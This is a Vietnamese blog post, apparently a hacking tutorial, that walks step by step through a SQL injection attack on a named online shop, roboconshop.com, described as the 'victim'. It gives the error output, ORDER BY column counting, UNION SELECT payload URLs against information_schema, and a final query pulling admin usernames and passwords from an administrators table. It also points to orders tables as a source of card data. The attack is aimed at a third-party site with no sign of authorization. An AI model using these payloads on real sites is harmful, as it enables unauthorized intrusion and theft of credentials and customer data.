Victim hum nay của chúng ta là www.roboconshop.com (Hack hàng VN cho load nhanh)
Trước khi hack, việc đầu tiên là cần tìm link bị lỗi, cách tìm là thêm dấu "phẩy" sau mỡi link, các link lỗi thường là những link show sản phẩm, hoặc là các link tin tức, thông báo... ta vào tìm linklỗi nào...
Vậy là link sản phẩm ko bị lỗi, ta chuyển sang link tin tức xem sao???
============================================
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
select * from news_infos where id = 38\'
==============================================
Tèn tén ten, là lá la. Bị lỗi gòy. Bắt đầu khai thác lỗi nào:
Việc đầu tiên là đếm column bằng công thức order by X (Với X từ 1 đến mấy ngàn... chắc ko đến đó đâu, khoảng chừng 10 hay 20 à)
Nên nhớ ghi gõ fãi bỏ dấu fẫu, và kết thúc fải có dấu --
Nếu site trả về bình thường thì nghĩa là có X column, ở ví dụ này X là 1, nên site có 1 column, típ tục đếm. Đếm đến khi nào site trả về lỗi mới thôi
===========================================
1054 - Unknown column '7' in 'order clause'
==========================================
Tạm dịch là ko có cột thứ 7, có nghĩa là site này có 6 column.
Típ...
Sau khi bít có 6 column thì ta phải sử dụng công thức union select {số column}--
Đừng làm wá nhanh, nên coi kỹ site trả về, thấy số 2 chứ. Để thuận tiện hơn, ta thay số 38 thành null cho dễ nhìn. Đấy.
Ta xem version của nó bằng công thức version(). Mà các bạn hỉu ý nghĩa của sớ 2 chứ??? Ko hỉu cũng hẽm sao, chỉ cần bít ta khai thác thông tin từ số 2 này, tương ứng với column 2. Thay version() và số 2 ở dòng query
Version trả về là 5.0.27, tóm lại là version 5.
Hãy nhớ, trong version 5 có 1 table tên là information_schema. Đq6y là table wan trọng để lấy thông tin. Học thuộc công thức này ...
===========================================
http://roboconshop.com/xem.php?tin=null union select 1,table_name,3,4,5,6 from information_schema.tables--
===========================================
Ý nghĩa của dòng code này là truy vấn tên table nằm trong information_schema.
Site sẽ trả về rất nhìu table_name, chúng ta fãi xác định table chúng ta cần lấy thông tin.
Ví dụ như admin thì ta có table administrator
thông tin CC thì có thế là orders...
Ở đây mình chỉ lấy acc admin thui
có table admin gòy, ta truy vấn column từ table admin bằng công thức...
===========================================
http://roboconshop.com/xem.php?tin=null union select 1,concat(table_name,char(58),column_name),3,4,5,6 from information_schema.columns--
==========================================-=-
xem xét lệnh này nào
concat() có nghĩa là kết nối giữa table và column
char(58) có nghỉa là dấu 2 chấm :
information_schema.columns nghĩa là vị trí dể lấy column
Nhấm tí, pause chút để check
về gòy, hic. Tại đánh nhầm Sorry anh em herhe
Cùng đọc nhé:
CHARACTER_SETS:CHARACTER_SET_NAME
Character_sets là table_name
: là char(58)
CHARACTER_SET_NAME là column_name
Vậy hỉu ý nghĩa của concat chưa???
Xong, ta tìm table có tên là admin nhá
Ta thấy table admin có 3 column tên là ID, user_name và user_password. Ta sắp về đến đích gòy.. kà kà
truy vấn típ = câu lệnh
======================================================
http://roboconshop.com/xem.php?tin=null union select 1,concat(user_name,char(58),user_password),3,4,5,6 from administrators--
=====================================================
Nghĩa là hãy lấy user name và user password của thằng admin ra đây cho tôi từ table administrator
Không có nhận xét nào:
Đăng nhận xét